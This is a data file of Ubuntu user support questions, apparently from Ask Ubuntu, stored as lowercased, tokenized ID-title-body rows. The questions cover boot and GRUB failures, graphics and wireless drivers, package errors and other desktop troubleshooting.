387937	black screen after grub menu	recently i randomly opened my computer and selected ubuntu 12.04 from grub . the screen changed into a black screen and thhe login screen never showed up . i 've tried stuff from other forums posting the same issue ( nomodeset , ? ? ? ? .modeset =0 , etc ) , but nothing works . some help would be appreciated . specs : model : hp pavilion dv4 notebook pc graphics card : intel sandybridge mobile processor : intel core i3-2330m cpu @ 2.20ghz x4 after this , please introduce me to a book so i can actually understand all this technical stuff . thanks .
387939	i bugged it . please help !	i just saved the is file to did disc . i started installing ubuntu and i chose my language and clicked continue . then it lagged . i waited 10 minutes and actually nothing happend . i restarted my computer and it could n't start neither ubuntu nor windows . what should i do ? it says that we wubildr.mbr is missing . can i paste that file to my disc ? i ca n't start neither of them . i do n't have disc of windows .
387941	trying to install windows xp ; bootmgr is missing	i recently installed ubuntu 13.04 , and i wish to go back to windows xp . i have all the install files on a usb , but the only problem is when i go to install it , i get an error that says `` bootmgr is missing , ctrl alt delete to restart '' any help ? thanks i 've been stuck trying to fix this error for the past two days now , and i was n't successful . much thanks to anyone that can help me fix it .
387944	how to find cpu shutdown temperature ? ( think it 's called tjmax , maybe not though ... )	in windows there is a program called cpu temp which shows various cpu temperatures , one which being the temperature at which point the computer will shut down to prevent damage to the cpu . i have a script which will intelligently prevent the cpu going over a certain temperature , but i would like to know what temperature i can go up to : d
387945	official ubuntu mouse cursor theme ?	i would be more than happy to know if there 's any work-in-progress ongoing to create a fresh official cursor theme for ubuntu . a lot of work is dedicated to design in terms of a new icon-set proposed for 14.04 lts , yet no such effort is heard in terms of a new cursor theme . also , despite the fact it 's entirely a different post - the mouse cursor change process is horrifying - see here why . cheers .
387949	ca n't connect to wireless network 13.10	ca n't connect to wireless network on my laptop ( packard bell tm81 ) . ethernet works fine , and i did n't have any of this trouble on other versions of ubuntu . i 'm kind of new to linux and i will love to learn more
387951	boot-time fsck on all 16 drives gives memory allocation failures	my installation of ubuntu server 12.04 has each volume set to a check interval of one week . however , there are 16 drives ( boot plus 15 storage drives , all ext4 ) . apparently this is too much for a mere 8 gig of memory to run all at once , because most of the checks fail with memory allocation errors when they actually get triggered , and inevitably one of them will tell me there are `` serious errors '' and that i have to fix them manually . at which point i manually unmount all , run fsck on all ( one at a time ! ) , and see absolutely clean volumes . what i have tried : setting all the `` fsck '' values in fstab to sequential values ( 1 , 2 , 3 , 4 , âś ) in the hopes that this would actually be followed at boot time and the checks would be done one at a time . made no difference . what can i do to fix this ?
387959	broadcom hybrid chipset wifi works bluetooth does not	i have a hp envy touchsmart 15 and it has a hybrid broadcom chipset that 's both wifi and bluetooth . wifi works excellently however the bluetooth does n't work . ubuntu recognizes that the computer does indeed have bluetooth and sometimes will detect other bluetooth devices , but it can not interact in anyway with them . it can sometimes see , but will not connect , and it is not visible to any other bluetooth device . all bluetooth settings are correct .
387962	emulate right click on touchscreen in ubuntu 13.10	i have an hp envy touchsmart 15 and i ca n't find a way to emulate a right click on a touchscreen . i remember there being an option for it in way older versions of ubuntu , as to hold the left click button for so long and it 'd emulate a right click . however in 13.10 i can not find any such option under any accessibility or mouse settings .
387963	windows - > ubuntu 12.04 migration : redbean php error	i am moving a wamp server to ubuntu and started getting a weird error related to the redbean orm library for php : b > fatal error : class redbean_driver_pdo contains 9 abstract methods and must therefore be declared abstract or implement the remaining methods ( redbean_driver : :getall , redbean_driver : :getcell , redbean_driver : :getrow , ... ) in /opt/bitnami/apps/my_project/my_app/classes/rb.php on line 423 i 've verified connection to my remote database i am 100 % positive these methods are implemented . has anybody seen an error like this ? i feel like its related to my server configuration with apache/php . thanks for your help .
387964	validity sensors fingerprint reader not detected	i have an hp envy touchsmart 15 and it came with a fingerprint reader . i 've never had a fingerprint reader in a laptop before but i 've seen them work under ubuntu quite well . however , with the fingerprint reader in this computer , a validity sensors fingerprint reader , it is not detected . does anybody know of a fix for this ?
387965	multitouch gestures on ubuntu 13.10	i 've recently purchased an hp envy touchsmart 15 and so far the touchscreen has worked excellently and i 'm very pleased with it . i know of the 4 finger to open the dash and the 3 to move windows so i know the multitouch does work ... but it is possible to enable features such as pinch-to-zoom and the like ? things that you 'd typically see on a smart phone or tablet ?
387966	how do i resolve a `` maas '' : no public ssh keys found . error ?	i am encountering an error when installing juju : juju bootstrap error error parsing environment `` maas '' : no public ssh keys found . i have installed rsa key which is found in my root folder after i have used my root user to create it . any idea ?
387967	grub repair does not work	i nearly giving up of the computer world . after installing twice windows and later ubuntu , grub was not installed . the grub repair do n't work . i am loosing my mind . i first installed windows xp on the first partition and on the second i install ubuntu 12.4. upgraded it to 12.4.3 but it did not even install grub . then after attempting to install grub , now i just can access from ubuntu . although i can see the at start up the windows option , when i select it , it just hung there forever . xoo ,
387968	intel nvidia hybrid graphics card	i have an hp envy touchsmart 15 and by default it 's running off of the intel integrated graphics which is surprisingly doing a great job , capable of running 3d games very well and i 've had no issue with it . the extra graphical load is n't even taking a toll on the processor , surprisingly . however , the nvidia is n't even detected or anything . not available under the additional drivers or anything , but if i look through the hardware listing it is listed . i was just wondering how to enable the nvidia ... or would it be a good idea to ? the nvidia is a nvidia geforce gt 740m . is it possible to enable the nvidia ? or would it be a smart idea to ? that is if the nvidia drivers are crap or have the potential to create an instability in the system .
387969	graphics card driver issues , ati , radeon hd 4200	i have had a major issue once i installed ubuntu 13.10 . i noticed that my performance was slow and it appeared to me that i needed to install my drivers . so as most people do i go look for a quick , easy , and fast , solution . so i came here and after reading around they said to type a few things in the terminal , and also looking around i noticed a lot of people say `` go look in system settings and look for the additional drivers tab and all of your drivers should be all waiting for you on a silver platter waiting to update . '' i went to this magical place they spoke of and it showed that `` no additional drivers are available . '' so i go and look on the askubuntu and go to this link and i did everything for the 64x system to install drivers . and nothing really seemed to be off or anything bad , i actually got really excited because i did not see any errors in the terminal ( could just be me being oblivious ) so i go and look at my graphics card again in the `` about this computer '' and it still says i have `` gallium 0.4 on amd rs880 , now i know for sure i have a amd radeon hd 4200 graphics card , and if ubuntu is saying that i have some gallium thing , ( this is where i got lost ) do i update the drivers for this gallium thing that just appeared as my so called graphics card ? ( hopefully not ) or do i look for more ways to update my graphics card ? now i have heard a few things about proprietary and open source graphic drivers . either way guys i am very very lost and confused and a tad bit scared , so i would love if you helped me out . tl ; dr graphics card driver = bad , send help ! here are some system information just incase some of you need it . memory : 3.6 gib ( i have 4 installed i don’t know why it is showing 3.6 ) processor amd phenom ( tm ) x2 521 processor × 2 ( maybe the only thing right on this new install of ubuntu , no offence i love it just i’m confused . ) graphics : gallium 0.4 on amd rs880 ( i actually have a ati radeon™ hd 4200 series ) os type : 64-bit disk : 980.4 gb ( again i have one terabyte as my hard drive , i may just be a derp and that is a terabyte in gb 's , but i failed to start a new problem for myself by investigating this . ) since this is my problem and you guys are here to help me out of your own free goodwill then i have the obligation to help you help me , i will give you any information , and i hope to get to the bottom of this . ( i never type this much , unless it is an essay , and barely when i have those . ) also if there is another thread like this then i am very sorry , my forum etiquette is not the best .
387976	uhci_hcd is draining my battery ?	i 'm an ubuntu user for about a year . so far , i 've tried linux mint ( nadia & olivia ) and ubuntu 12.04 and 13.10 . currently i 'm on 12.04 lts . on all of the operations system i used , i experienced the same problem - battery lasts only for 15 minutes while unplugged . i 've tried to solve this problem with following tricks : jupiter and tlp . with jupiter , i was able to get about 3 minutes more . changing nouveau graphics drivers with proprietary nvidia ( my graphics card is geforce g 105m ) . problem has n't been solved , and graphics started behaving quite strange , so i switched back . disable bluetooth and wifi by hardware switch . no result . as proposed here i tried sudo powertop-1.13 -d -t 60 > powertop.log and got the following output : 55.4 % ( 912.3 ) [ uhci_hcd : usb8 , eth1 ] < interrupt > 12.3 % ( 202.4 ) chromium-browse 6.5 % ( 106.4 ) swapper/1 6.0 % ( 98.5 ) alsa-sink 5.3 % ( 88.1 ) [ rescheduling interrupts ] < kernel ipi > 4.1 % ( 67.0 ) xorg 2.9 % ( 48.2 ) ps/2 keyboard/mouse/touchpad interrupt 2.6 % ( 43.4 ) swapper/0 0.0 % ( 0.2 ) d browserblocking 1.1 % ( 17.7 ) d transmission-gt does it mean that the problem is strictly related to the usb driver ? do i need to disable uhci_hcd ? thank you
387977	open spades make problem	i 'm trying to compile a game called open spades , but when i run `` make install '' or `` make '' it gives me this error . [ 73 % ] built target angelscript_addons [ 73 % ] built target angelscript [ 73 % ] built target openspades linking cxx executable ../../bin/drawtest /usr/bin/ld : /usr/lib/x86_64-linux-gnu/libfltk.a ( fl_double_window.o ) : undefined reference to symbol 'xdbeallocatebackbuffername' /usr/bin/ld : note : 'xdbeallocatebackbuffername ' is defined in dso /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libxext.so so try adding it to the linker command line /usr/lib/gcc/x86_64-linux-gnu/4.6/../../../x86_64-linux-gnu/libxext.so : could not read symbols : invalid operation collect2 : ld returned 1 exit status make [ 2 ] : *** [ bin/drawtest ] error 1 make [ 1 ] : *** [ sources/tests/cmakefiles/drawtest.dir/all ] error 2 make : *** [ all ] error 2 the link to the source code is here : https : //github.com/yvt/openspades note : i did not make this game or help in any way . i 'm just trying to play it , that 's all ...
387979	looking for a jukebox player on ubuntu	i 'm looking for a jukebox player at a party that lets anybody of the participants to add a song to the queue without having it played immediately over the song being played at the moment/cut the queue . i once had a very nice one running on windows , but i ca n't get it to run with mono . well there must be something like that in ubuntu i guess : needed features : fast search trough library ( ~20k songs ) nice , easy to understand interface fading between tracks normal users can only search library and queue stuff superuser ( of that program ) has full control ( is password protected ) create & save playlist should play the common formats ( only audio ) if the queue is empty , some predifined songs are played any ideas ? the user restriction is important . the computer will be operated by everybody there . meaning nobody will try to hack the system , but there should be some kind of safety system that the running song will not change every 10 sek ... there is plenty of software available for windows ( like media monkey ) surely there must be something for linux
387980	why ca n't i see my new partition in the file system	i ran gparted from the 'livecd ' shrank the large partition , created a new one , and saved the changes , but now running ubuntu i ca n't see this partition . what is my failing ? apologies if it 's a bit of a basic mistake ... partition table : msdos number start end size type file system flags 1 1049kb 262gb 262gb primary ext4 boot 3 262gb 496gb 234gb primary ext2 2 496gb 500gb 4170mb extended 5 496gb 500gb 4170mb logical linux-swap ( v1 )
387982	ubuntu touch account problem	after two days of work i finally installed ubuntu touch on my galaxy nexus my first impression is very good , but i do n't really know how to interact with the phone . for example : i want to link my google account but after typing 2 letters the keyboard vanishes and the login screen goes back to account selection screen . these two problems are my biggest ( atm )
387983	errors were encountered while processing : zram-config lubuntu-desktop	i 'm trying to setup a vagrant development machine with a saucy 64 guest using this image : http : //cloud-images.ubuntu.com/vagrant/saucy/current/saucy-server-cloudimg-amd64-vagrant-disk1.box after vagrant up , i have tried installing lubuntu-desktop using apt-get install lubuntu-desktop , after which i hit the following error : ... update-initramfs : generating /boot/initrd.img-3.11.0-14-generic errors were encountered while processing : zram-config lubuntu-desktop e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any pointers appreciated ...
387984	ubuntu 13.10 not installing using usb on windows 7	i have downloaded the ubuntu 13.10 iso from ubuntu.com , and i 'm trying to install it from my usb pen drive . i did everything as stated on the ubuntu website . i restart my pc and it just directly boots into windows 7 . i have changed my bios order and tried but still the same problem . i have tried doing it with 4 different pen drives but it 's still the same . later on , when i tried to change the bios priority order , it stopped showing even the pen drive , so i guess now it 's not even detecting it . what should i do guys ? ?
387987	no boot menu after win7/12.04 dualboot install . already ran boot-repair unsuccessfully . paste file included	i have installed ubuntu12.04lts alongside windows7 . after that , no boot options appeared . i ran boot-repair from live cd to no avail . the link given was http : //paste.ubuntu.com/6541996/ any direction given from this point will be greatly appreciated . also , of course , any additional information needed that i may have omitted will be made available upon request .
387988	problem in installation in my system which preilstalled xp	so i downloaded and burned to a dvd placed the dvd in my computer restarted the computer and nothing happens . i dont get it would you guys please give me a hand here ? i have a window xp emachine .
387991	how can i revert from 13.10 to 12.04 ?	i upgraded my distro from 12.04 to 13.10 , but it seems to have crashed my machine . i 'm dual-booting , and grub is okay - but my desktop appears with errors . i ca n't shut down properly , because the gui is gone , and an internal error appears upon boot . i ca n't get to the terminal without using ctrl+alt+f1 , and when i shut down from there all clicks are disastrous . i do n't know if i should upload a log ( netstart no longer seems to work ) . please help me get my os back ; i have a lot of data stored that i ca n't afford to replace .
387992	reset settings of gnome-control-center sound program	i have ubuntu 13.10 installed on my notebook . i have a problem only with skype . when it plays a notification sound , the program is muted on gnome sound settings ( as seen in the screenshot ) . but the phonecall is ok. only the notifications sounds are muted . how can i reset the settings to default configurations ? i ca n't use the mouse to adjust thee volume level of skype because the notification is very quick , and the sound bar level also disappears quickly ( whenever i am able to adjust , the program never remembers the setting ) .
387995	flash plugin install - dependency problem	today i get a new fresh copy of my ubuntu 12.04 32bit . i install ubuntu-restricted-extras from terminal and all was okey . but when i try to open youtube , it says that i need to install flash plugin . i thought the flash plugin would automatically install with restricted extras . next i tried to do with `` sudo apt-get install flashplugin-installer '' , but come up with following messages . reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : flashplugin-installer : depends : libnss3-1d but it is not going to be installed depends : libnspr4-0d but it is not going to be installed e : unable to correct problems , you have held broken packages . anyone could please help me how can i overcome this problem .
388000	installation stuck at xubuntu ubiquity : setting up grub-efi-amd64-signed - how can i overcome this ?	when trying to install xubuntu 13.10 , it always stops at xubuntu ubiquity : setting up grub-efi-amd64-signed ( 1.22.1+2.00-19ubuntu2.1 ) ... it 's just stuck there . nothing is happening , although i can continue to use the usb live mode as i am typing this post right . i am installing from a usb drive booted into uefi because i want to dual-boot with win 7 pro x64 , so switching to legacy bios mode is out of the question unfortunately . i do n't have any encrypted partition or drive . does anyone have any pointers how i could overcome this ?
388002	how to know if i have muxed hardware	i 'm reading this page . regarding this statement vga_switcheroo is the kernel mechanism that allows you to switch between gpus if your machine has a hardware mux . does this mean manual or live switching ( i.e . automatic ) how to know if i have hardware mux ? ( my machine is dell inspiron se 7520 ) note that this method is not supported by all machines and only works if you are using the opensource driver ( nouveau , radeon ) and not the proprietary ones ( nvidia , fglrx ) . i 'm not sure which is which of what i can chose from the available drivers tab ( i.e . please check the the picture below ) i need to resolve the mentioned questions before proceeding further with the guide .
388003	.sh file opens with emacs instead of running	i installed android studio , and this program starts from the studio.sh file . if i run it from the terminal it goes well , but if i double click on it , this file is opened with emacs . why ?
388005	amount of disk space needed to install	i 'd like to create a partition where to install ubuntu in a dell inspiron 6000 with winxp os already installed . what is the minimal amount of disk space required for booting the system ? then i 'd create another partition for the data . i tried to install ubuntu alongside winxp without creating a dedicated partition but the grub install failed at the end .
388012	how to share ubuntu internal 2nd hard drive to windows 7 computer	i have a window xp computer with two hard drives : one is the os boot drive the other is the data drive formatted as ntfs . i have a windows 7 computer that can `` see '' both drives that are shared on the xp computer . i have now installed lubuntu on the xp computer so it is dual bootable . in lubuntu i want to share the second internal data hard drive using samba so the windows 7 computer can `` see '' this share . can this even be done ? there are many posts on sharing folders on the ubuntu boot drive and posts on mounting the 2nd data drive while in ubuntu , but i can find no posts on sharing a 2nd internal hard drive with a windows network . with windows xp being used as a file server on so many networks and its impending demise i ca n't believe no one is asking about this as a way to keep the hardware by converting the os to ubuntu
388014	bash_version not set and .bashrc not sourced in the interactive shell	i created a new user by executing sudo useradd -m harry when i try to substitute the user by `` su - harry '' then everything i can see is a `` $ '' ( dollar ) sign , the autocompletion is n't working and the shell builtins ( e.g . source ) are not available . i checked .bashrc and .profile and detected that .bashrc is not getting sourced because $ bash_version is not set . the code inside .profile looks like follows : # if running bash if [ -n `` $ bash_version '' ] ; then # include .bashrc if it exists if [ -f `` $ home/.bashrc '' ] ; then . `` $ home/.bashrc '' fi fi the command echo $ bash_version returns nothing . $ echo $ bash_version $ shell builtins ( source .bashrc , . .bashrc ) do n't work either . the shell variable value was '/bin/sh ' which is alias of dash . i changed it to /bin/bash ( export shell=/bin/bash ) but it did n't have any effects . when i hardcode `` . .bashrc '' in .profile ( of course , just to check if it would work ) i receive several errors : admin @ host : ~ $ sudo su - harry -su : 13 : /home/harry/.bashrc : shopt : not found -su : 21 : /home/harry/.bashrc : shopt : not found -su : 105 : /home/harry/.bashrc : shopt : not found -su : 28 : /etc/bash_completion : [ [ : not found -su : 34 : /etc/bash_completion : [ [ : not found -su : 51 : /etc/bash_completion : bad substitution \ [ \e ] 0 ; \u @ \h : \w\a\ ] \u @ \h : \w $ any ideas how to fix it ? thank you in advance . jepetko
388016	encountered a section with no package : header , while updating	the following note telling me i have a problem but i am unable to report this problem because this problem is why i ca n't report it ! ! ( i think ) also i have no idea where to find the update - manager ... ... any advice would be great ... an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/archive.ubuntu.com_ubuntu_dists_precise_restricted_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
388025	how to view 4k video	i 'm trying to view some 4k resolution mp4 videos generated by a galaxy note 3 on my mid-2010 macbook pro 7 , 1 running ubuntu 13.10 . using any of the standard major video players ( vlc , totem etc . ) , i 'm having difficulties seeing anything . just as evince presents pdfs in a limited resolution for the purposes of speed , is there a video player that can do something similar for the presentation of 4k video in a lower resolution so that i can view it ? alternatively , is there some fast way for me to convert the video files to files with specified lower resolutions ? thanks for your suggestions !
388029	gedit and ssh `` importerror : no module named 'cairo ' ''	short description : i want to run an instance of gedit , provided by my ubuntu 13.10 `` server '' on another computer . it works via ssh -x , but some plugins can not be installed ( in my case it is 'snippets ' ) . after installing gedit and gedit-plugins none of the plugins worked . i installed dbus-x11 and most of them worked - `` snippets '' , unfortunately , still does n't . bash says : traceback ( most recent call last ) : file `` /usr/lib/x86_64-linux-gnu/gedit/plugins/snippets/__init__.py '' , line 18 , in < module > from .appactivatable import appactivatable file `` /usr/lib/x86_64-linux-gnu/gedit/plugins/snippets/appactivatable.py '' , line 26 , in < module > from .manager import manager file `` /usr/lib/x86_64-linux-gnu/gedit/plugins/snippets/manager.py '' , line 29 , in < module > from .document import document file `` /usr/lib/x86_64-linux-gnu/gedit/plugins/snippets/document.py '' , line 21 , in < module > import cairo importerror : no module named 'cairo' ( gedit:954 ) : libpeas-warning ** : error loading plugin 'snippets' when i try to select `` snippets '' in the plugins preferences . any idea what i am doing wrong ? long description : i 'm using a macbook air for daily work . unfortunately there seems to be no way , to get gedit running on os x mavericks ( or any other os x capable of running on the macbook ) . so , if anyone knows a workaround for that , it would be a possible solution to . ( i 've tried an older version of gedit - 2.x.x i guess - it did n't crash , but it was rather buggy . ) so i installed a `` hardware friendly '' ubuntu server via parallels desktop 9 . i guess there are distros which are far more lightweight , but ubuntu works really seamlessly with pd9 , so i chose it . via xquarts linux applications like gedit can easily be streamed over ssh . so i 'm able to run gedit . but i `` need '' the snippets . there are of course many other text editors for mac os , but they cost a lot of money or are incapable of almost anything . best regards and thanks in advance , markus
388031	deleted windows bootmgr partition dual boot	i seriously messed up my dual boot system . i had windows 8 installed alongside ubuntu 13.10 , and everything was working fine with grub . i decided to get fancy and tried to install easybcd , but messed stuff up . here is what i am working with : 401mb of unformatted space /dev/sda3 ntfs windows reserved space /dev/sda4 ntfs windows partition /dev/sda5 ext4 ubuntu partition /dev/sda6 linux-swap if i remember correctly , there was a fat32 partition in the unformatted region , but i think i deleted it . when i do update-grub on the ubuntu partition , it does not even see the windows 8 partition , because i think i deleted the bootmgr image . i have both a ubuntu install disc and a windows 8.1 install disc . any help ? ?
388032	zynaddsubfx has no instruments	i did a fresh install of ubuntu studio 12.4 yesterday and went through a process to install linux multi media studio with wine for vst support , but when i load zynaddsubfx it have no instruments i 'm not sure if its because i 'm using wine , ubuntu studio or its missing packages , but i 'm not sure how to download packages or use synaptic to download them a step by step guide would be helpful any amount of help would be useful : ) -b
388037	how to create an ( ubuntu ) .img file from .iso on ubuntu ?	i would like to create an .img file containing ubuntu 13.10 . i know how to get the .iso , but instructions for how to 'convert ' it to .img i only found under mac ( see , for example , here ) -- however , i work on ubuntu 13.10 . which are the steps necessary to create the .img file ? background information : i would like to use the .img to run it with complete linux installer on android . complete linux installer already offers .img files ( see here ) , but they are too small . ubuntu only `` sees '' the size of the .img file which is far too small to be productive -- which is why i would like to create a larger .img file . using resize2fs myimage.img 4g , i tried to make the image larger , but ubuntu run from such an image still believes the .img is small , so my hope is that by creating a larger .img right away , ubuntu `` sees '' the larger space . i know i 'm on thin ice here ...
388040	wireless ( wpa2 ) keeps asking for password	i am on ubuntu 14.04 ( i686 ) . i read that there is one or more reported bugs related to this issue . i do not know if they are fixed as they appear to be in 11.10 . here is hw info and what i have tried : the computer is dell latitude d510 nic is reported as a dwa-140 ralink rt5372 my desktop environment is xfce the password is correct i tried available for all users i have wpasupplicant the connection works in windows xp on the same machine connecting to another wi-fi using wpa2/enterprise seems to work it worked but i needed a re-install . i have some succeeded connecting manually : wpa_supplicant -b -iwlan0 -c/etc/wpa_supplicant.conf -dwext & & dhclient wlan0 this locates the problem to networkmanager
388042	`` fatal ! inconsistent data ( numbers ) ''	i installed ubuntu on my portable external hard drive . i ran it successfully the first time and played around in it . afterwards , i shutdown , and removed the portable hard drive and plugged it back in . tried booting back into ubuntu , and well , it have me about 10 of those kind of errors and the loading screen gave a fatal error which was similar to this . after that it was really giving me more errors and not starting anything ...
388043	saving changes in pictures	i have made some changes to some of the pictures in my album ( like `` crop '' etc ) - how do i save the changes ? when i send it it goes back to its original version ! where does obuntu has `` save '' or `` apply '' like picasa has ?
388046	ubuntu 13.10 does n't boot : exception emask 0x0 sact	recently , my ubuntu does n't start after a bad shutdown because of my laptop power was empty . i can see the grub and when i select ubuntu.. i get approximatively this errors : exception emask 0x0 sact read fpdma ... add sense unrecovered error auto reallocate failed i/o error dev sda ... ext4-fs error _ext4_get_inode_loc unable to read itable block so i 'm lost , i do n't know what i should begin to do to repair my ubuntu . please can you help me ? i can run my windows 7 whithout errors in dual boot . thanks , mehdi . ps : sorry for my english.. i 'm french .. : )
388047	how to remove django	running ubuntu 10.04 lts i had a testdrive with django from sources . but now i want to change to latest django 1.6 . so how to remove the older django 1.4.3 ? i ask this after going thru the obvious steps because the following python -c `` import django ; print ( django.get_version ( ) ) '' reports still 1.4.3 . not sure if this 1.4.3 was already an upgrade using a direct download ... so not sure to follow the path which python -c `` import sys ; sys.path = sys.path [ 1 : ] ; import django ; print ( django.__path__ ) '' reports and delete this folder : [ '/usr/lib/pymodules/python2.6/django ' ]
388048	upgrade gphoto2 from 2.4.11 to 2.5.2	it seems i have run into a bug in gphoto2 when using canon dslrs ( i.e . 550d or t2i ) . -- capture-image times out unless i push the shutter button ( sort of defeats the purpose of using gphoto2 ) . this appears to be fixed in version 2.5.2 . however , the easy way to install the newer version of gphoto2 does not appear to exist yet ( i.e . apt-get ... ) . could someone help a newbie through the steps of doing the installation from tar.bz2 ?
388049	problem during install	i currently have windows 7 installed on my dell inspiron 15r 5537 laptop . i 'm facing this issue while trying to install ubuntu : i click on yes , i click no ... and nothing happens . any ideas ?
388050	stuck after wubi installer	so after the wubi finished the install and rebooted , something failed and went to busybox shell . i have tried this twice now . system specs : i7 930 oc 4.21 6gb ddr3 1600 mushkin blackline c : wd raptor 300x2 raid 0 d : wd blue 250gb ( apps ) e : seagate 320 gb ( movies ) f : wd black 750gb ( movies ) is the raid breaking my ubuntu install or something else ?
388051	13.10 upgrade was unsuccessful	recently , i 've upgraded ubuntu from 12.04 to 12.10 to 13.04 ( in the same day ) and finally finished the download for 13.10.. as i finished the download , i restarted the computer and now it 's not going past the startup screen . i have no idea what to even ask at this point , but i 'd like some answers on how to get my computer going again ...
388052	install b43 drivers without internet connection	i 've spent all day trying to solve this with no results . i am using elementaryos luna , but since it runs on ubuntu ... the problem i have is that my dell vostro 1500 has defective ethernet . it ca n't connect to ethernet for some reason , most probably a hardware problem , so i need to install the drivers without having internet in the computer in which it 's getting installed . any solutions that require a second computer with linux wo n't work . this is being typed from os x and the other computer i have is the computer with the problem . running lspci i get : 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:02.0 vga compatible controller : intel corporation mobile gm965/gl960 integrated graphics controller ( primary ) ( rev 0c ) 00:02.1 display controller : intel corporation mobile gm965/gl960 integrated graphics controller ( secondary ) ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.3 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 ) 0c:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) i am aware i need the b43 firmware set or something but i ca n't seem to find any instructions that work for me . any other info you need to help me out , please do tell me and i 'll do my best to provide it . p.s . : to get the output of the commands i 'm piping the output of the command to a text file in a usb then copy pasting here from a working computer . edit 1 : output of dmesg | grep -e b43 -e wlan : [ 2.740106 ] b43-pci-bridge 0000:0c:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 2.740171 ] b43-pci-bridge 0000:0c:00.0 : setting latency timer to 64 [ 13.026193 ] b43-phy0 : broadcom 4312 wlan found ( core revision 15 ) [ 13.122019 ] registered led device : b43-phy0 : :tx [ 13.122046 ] registered led device : b43-phy0 : :rx [ 13.122069 ] registered led device : b43-phy0 : :radio [ 14.340121 ] b43-phy0 : loading firmware version 666.2 ( 2011-02-23 01:15:07 ) [ 19.988670 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 19.988964 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 23.680660 ] wlan0 : authenticate with 00:26:44 : bc:0f:78 ( try 1 ) [ 23.684805 ] wlan0 : authenticated [ 23.685338 ] wlan0 : associate with 00:26:44 : bc:0f:78 ( try 1 ) [ 23.692129 ] wlan0 : rx assocresp from 00:26:44 : bc:0f:78 ( capab=0x411 status=0 aid=5 ) [ 23.692135 ] wlan0 : associated [ 23.693238 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 34.660029 ] wlan0 : no ipv6 routers present [ 69.204860 ] wlan0 : deauthenticating from 00:26:44 : bc:0f:78 by local choice ( reason=3 ) [ 73.033034 ] wlan0 : authenticate with 00:26:44 : bc:0f:78 ( try 1 ) [ 73.034978 ] wlan0 : authenticated [ 73.035362 ] wlan0 : associate with 00:26:44 : bc:0f:78 ( try 1 ) [ 73.041193 ] wlan0 : rx reassocresp from 00:26:44 : bc:0f:78 ( capab=0x411 status=0 aid=5 ) [ 73.041198 ] wlan0 : associated [ 84.024051 ] wlan0 : no ipv6 routers present [ 118.208901 ] wlan0 : deauthenticating from 00:26:44 : bc:0f:78 by local choice ( reason=3 ) [ 122.305180 ] wlan0 : authenticate with 00:26:44 : bc:0f:78 ( try 1 ) [ 122.308896 ] wlan0 : authenticated [ 122.309598 ] wlan0 : associate with 00:26:44 : bc:0f:78 ( try 1 ) [ 122.331440 ] wlan0 : rx reassocresp from 00:26:44 : bc:0f:78 ( capab=0x411 status=0 aid=5 ) [ 122.331450 ] wlan0 : associated [ 132.584138 ] wlan0 : no ipv6 routers present [ 168.205906 ] wlan0 : deauthenticating from 00:26:44 : bc:0f:78 by local choice ( reason=3 ) [ 172.312791 ] wlan0 : authenticate with 00:26:44 : bc:0f:78 ( try 1 ) [ 172.314841 ] wlan0 : authenticated [ 172.315380 ] wlan0 : associate with 00:26:44 : bc:0f:78 ( try 1 ) [ 172.320773 ] wlan0 : rx reassocresp from 00:26:44 : bc:0f:78 ( capab=0x411 status=0 aid=5 ) [ 172.320783 ] wlan0 : associated
